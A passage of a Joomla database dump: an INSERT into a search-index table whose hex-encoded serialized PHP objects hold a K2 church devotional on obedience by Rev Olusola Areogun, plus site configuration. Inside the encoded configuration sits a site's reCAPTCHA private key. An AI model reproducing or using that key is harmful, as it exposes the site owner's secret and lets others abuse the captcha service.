20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223231223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2234393a66726f6d2d6f75722d6661746865722d732d68656172742d32382d30352d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f34392d66726f6d2d6f75722d6661746865722d732d68656172742d32382d30352d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3439223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34393a66726f6d2d6f75722d6661746865722d732d68656172742d32382d30352d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832382f30352f3230313729223b733a31313a226465736372697074696f6e223b733a3335353a2220446561726c792062656c6f766564206f6620476f642c20456d6272616365206469736369706c696e652120546f206265206469736369706c696e6564206d65616e7320746f207265636569766520747261696e696e67207468617420636f72726563747320796f752c206d6f756c647320796f752c206f72207065726665637473206d6f72616c2063686172616374657220616e64206265686176696f757220696e20796f752e204974206d65616e732061646a757374696e6720696e7369646520746f20747261696e696e672e204974206d65616e73207468617420796f752068617665206163636570746564206469736369706c65736869702028746861742069732c206120736574206f662076616c7565732920616e64206861766520696e7465726e616c697365642069742073756368207468617420697420636f6e74726f6c7320616e64206166666563747320796f7572206465636973696f6e732e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30352d32382031313a31383a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30352d32382031313a31383a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(273, 'index.php?option=com_k2&view=item&id=50', 'index.php?option=com_k2&view=item&id=50:from-our-father-s-heart-04-06-2017', 'Your obedience is what connects you to the supernatural - From our Father\'s Heart (04/06/2017)', ' Dearly Beloved, Your obedience is what connects you to the supernatural. Until you begin to take the issue of obeying God very serious you will keep being cut off from miracles and the supernatural. Perhaps you have kept wondering why you hardly experience miracles or it seems that the supernatural is not real because you don\'t experience it. ', '2017-06-25 14:19:44', '3ffc090660a4ee18ada7f6c15d959591', 1, 1, 1, '*', '2017-06-04 11:25:00', '0000-00-00 00:00:00', '2017-06-04 11:25:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223530223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d30342d30362d32303137223b733a373a2273756d6d617279223b733a3336333a223c703e446561726c792042656c6f7665642cc2a03c2f703e0d0a3c703e596f7572206f62656469656e6365206973207768617420636f6e6e6563747320796f7520746f207468652073757065726e61747572616c2e20556e74696c20796f7520626567696e20746f2074616b6520746865206973737565206f66206f626579696e6720476f64207665727920736572696f757320796f752077696c6c206b656570206265696e6720637574206f66662066726f6d206d697261636c657320616e64207468652073757065726e61747572616c2e205065726861707320796f752068617665206b65707420776f6e646572696e672077687920796f7520686172646c7920657870657269656e6365206d697261636c6573206f72206974207365656d732074686174207468652073757065726e61747572616c206973206e6f74207265616c206265636175736520796f7520646f6e277420657870657269656e63652069742e3c2f703e0d0a223b733a343a22626f6479223b733a313636303a220d0a3c703e54686520726561736f6e206d6179206e6f74206265206661722d666574636865642e2041736b20796f757273656c663a20e2809c416d2049206f626579696e6720476f643fe2809d2053696e636520492063616d65206f6e2074686520726f6164206f66207468652063616c6c696e672c20492063616e207374616e64206265666f726520746865204d617374657220616e642074656c6c2048696d20492068617665206f62657965642065766572797468696e67204920616d207375726520486520746f6c64206d6520746f20646f2074696c6c20646174652e2054686174277320776879206f757220657870657269656e636520697320696e207468652064696d656e73696f6e206f66207468652073757065726e61747572616c20696e2074686520447265616d2043656e7472652e204920656e636f757261676520796f7520746f20636f6d65206f6e20626f61726420696e2074686520726f6164206f66206f62656469656e636520746f6f20616e6420796f752077696c6c20657870657269656e6365207468652073757065726e61747572616c2e3c2f703e0d0a3c703e416c6c207468726f756768205363726970747572657320776520736565206d656e2077686f206f626579656420616e6420686164206d697261636c657320696e207468656972206c697665732e2046726f6d204e61616d616e20746865206c657065722077686f206f626579656420456c6973686120746f2064697020736576656e2074696d657320696e204a6f7264616e202832204b696e2e20353a31e280933134292c20746f207468652073657276616e74732074686174204d61727920746865206d6f74686572206f66204a6573757320696e737472756374656420746f206f626579207768617465766572204a6573757320746f6c64207468656d20746f20646f20617420746865206d617272696167652066656173742061742043616e6120284a6f682e20323a35292e20416c736f2072656d656d6265722074686520776f6d616e2077686f736520736f6e73207765726520746f20626520656e736c61766564206275742063616d6520746f20746865206d616e206f6620476f642077686f20746f6c6420686572207768617420746f20646f20616e6420736865206f6265796564202832204b696e2e20343a31e2809337292e20506574657220616c736f2077686f20746f696c656420616c6c206e6967687420616e6420636175676874206e6f7468696e67206275742061742074686520776f7264206f6620746865204d61737465722c204a657375732c206c657420646f776e20686973206e657420616e642068616420612072657475726e206f662074686520646f75626c6520626f617420284c756b2e20353a34e2809337292c206576656e2050657465722077686f2073746570706564206f7574206f662074686520626f617420617420746865204d6173746572277320776f726420284d61742e2031343a32383a3239292ec2a03c2f703e0d0a3c703e42656c6f7665642c20796f7572206f62656469656e6365206973207768617420636f6e6e6563747320796f7520746f207468652073757065726e61747572616c2064696d656e73696f6e2e20556e74696c20796f75207374617274206c6976696e6720616e206f62656469656e74206c69666520746f204a657375732c20746f20746865206d656e20486520706c61636564206f76657220796f7520616e642074686520617574686f726974696573206f76657220796f752c20796f75206d6179206f6e6c792068656172206f66207468652073757065726e61747572616c20616e64206e6f7420657870657269656e63652069742e20536f20636865636b20796f7572206c69666520746f64617920616e642073656520696620746865726520697320616e792061726561206f66206469736f62656469656e63652e20526570656e7420616e64207374617274206f626579696e672e205468697320697320796f757220736561736f6e20746f2077616c6b206f6e20776174657220627574206f62656469656e636520697320637269746963616c2e204d617920476f642068656c7020796f7520696e204a6573757327206e616d652e20416d656e2e3c2f703e0d0a3c703e54696c6c206e657874207765656b202c20676f20616e642077696e2077697468204a657375733c2f703e0d0a3c703e476f6427732053657276616e743c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30362d32352031333a30333a3335223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b1